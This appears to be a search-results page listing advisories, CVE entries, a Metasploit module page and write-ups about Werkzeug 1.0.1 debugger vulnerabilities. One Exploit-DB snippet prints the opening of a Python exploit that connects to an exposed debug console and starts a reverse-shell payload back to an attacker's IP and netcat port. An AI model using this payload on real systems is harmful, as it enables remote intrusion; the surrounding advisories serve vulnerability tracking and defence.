🌐
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
Werkzeug 1.0.1 vulnerabilities | Snyk
Learn more about known Werkzeug 1.0.1 vulnerabilities and licenses detected.
🌐
CVE Details
cvedetails.com › version › 1322600 › Palletsprojects-Werkzeug-1.0.1.html
Palletsprojects Werkzeug 1.0.1 security vulnerabilities, CVEs
Palletsprojects Werkzeug version 1.0.1 security vulnerabilities, CVEs, exploits, vulnerability statistics, CVSS scores and references
🌐
Snyk
security.snyk.io › snyk vulnerability database › pip
werkzeug | Snyk
Security vulnerabilities and package health score for pip package werkzeug
🌐
Rapid7
rapid7.com › db › modules › exploit › multi › http › werkzeug_debug_rce
Pallete Projects Werkzeug Debugger Remote Code ...
Of course this doesn't prevent developers from mistakenly enabling it in production! Tested against the following Werkzeug versions: - 3.0.3 on Debian 12, Windows 11 and macOS 14.6 - 1.1.4 on Debian 12 - 1.0.1 on Debian 12 - 0.11.5 on Debian 12 - 0.10 on Debian 12
🌐
GitHub
github.com › opensearch-project › data-prepper › issues › 1432
CVE-2022-29361 (High) detected in Werkzeug-1.0.1-py2.py3-none-any.whl - autoclosed · Issue #1432 · opensearch-project/data-prepper
May 27, 2022 - CVE-2022-29361 - High Severity Vulnerability Vulnerable Library - Werkzeug-1.0.1-py2.py3-none-any.whl The comprehensive WSGI web application library. Library home page: https://files.pythonhosted.org/packages/cc/94/5f7079a0e00bd6863ef8f1...
Published   May 27, 2022
Author   mend-for-github-com
🌐
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - Vulnerable App: #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
🌐
CVE Details
cvedetails.com › product › 41301 › Palletsprojects-Werkzeug.html
Palletsprojects Werkzeug security vulnerabilities, CVEs, versions and CVE reports
This page lists vulnerability statistics for all versions of Palletsprojects » Werkzeug. Vulnerability statistics provide a quick overview for security vulnerabilities of Werkzeug.
🌐
Medium
medium.com › swlh › hacking-flask-applications-939eae4bffed
Hacking Flask Applications. Executing arbitrary commands using the… | by Vickie Li | The Startup | Medium
February 18, 2020 - The issue here is not the Werkzeug debugger itself, but an incorrect way of configuring a Werkzeug application: making the debugger available on a production machine. A publicly exposed debugger will subject the machine to remote code execution.
Find elsewhere
🌐
GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages   Python
🌐
NIST
nvd.nist.gov › vuln › detail › cve-2024-34069
CVE-2024-34069 Detail - NVD
This is a potential security issue, you are being redirected to https://nvd.nist.gov · Official websites use .gov A .gov website belongs to an official government organization in the United States
🌐
CVE Details
cvedetails.com › vulnerability-list › vendor_id-17201 › product_id-41301 › Palletsprojects-Werkzeug.html
Palletsprojects Werkzeug : Security vulnerabilities, CVEs
February 3, 2018 - This issue has been patched in version 3.1.4. Source: GitHub, Inc. ... Werkzeug is a Web Server Gateway Interface web application library. Applications using `werkzeug.formparser.MultiPartParser` corresponding to a version of Werkzeug prior to 3.0.6 to parse `multipart/form-data` requests (e.g. all flask applications) are vulnerable ...
🌐
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
werkzeug 0.1 vulnerabilities | Snyk
Learn more about known werkzeug 0.1 vulnerabilities and licenses detected.
🌐
Ubuntu
ubuntu.com › security › notices › USN-4655-1
USN-4655-1: Werkzeug vulnerabilities | Ubuntu security notices | Ubuntu
It was discovered that Werkzeug has insufficient debugger PIN randomness. An attacker could use this issue to access sensitive information. This issue only affected Ubuntu 18.04 LTS.
🌐
Snyk
snyk.io › snyk vulnerability database › pip › werkzeug
Werkzeug 0.16.1 vulnerabilities
Security vulnerabilities and package health score for pip package Werkzeug 0.16.1
🌐
Ubuntu
ubuntu.com › security › notices › USN-6799-1
USN-6799-1: Werkzeug vulnerability | Ubuntu security notices | Ubuntu
It was discovered that the debugger in Werkzeug was not restricted to trusted hosts.
🌐
Ubuntu
ubuntu.com › security › notices › USN-3463-1
USN-3463-1: Werkzeug vulnerability | Ubuntu security notices | Ubuntu
October 25, 2017 - It was discovered that Werkzeug did not properly handle certain web scripts.
🌐
NIST
nvd.nist.gov › vuln › detail › cve-2023-46136
CVE-2023-46136 Detail - NVD
This is a potential security issue, you are being redirected to https://nvd.nist.gov · Official websites use .gov A .gov website belongs to an official government organization in the United States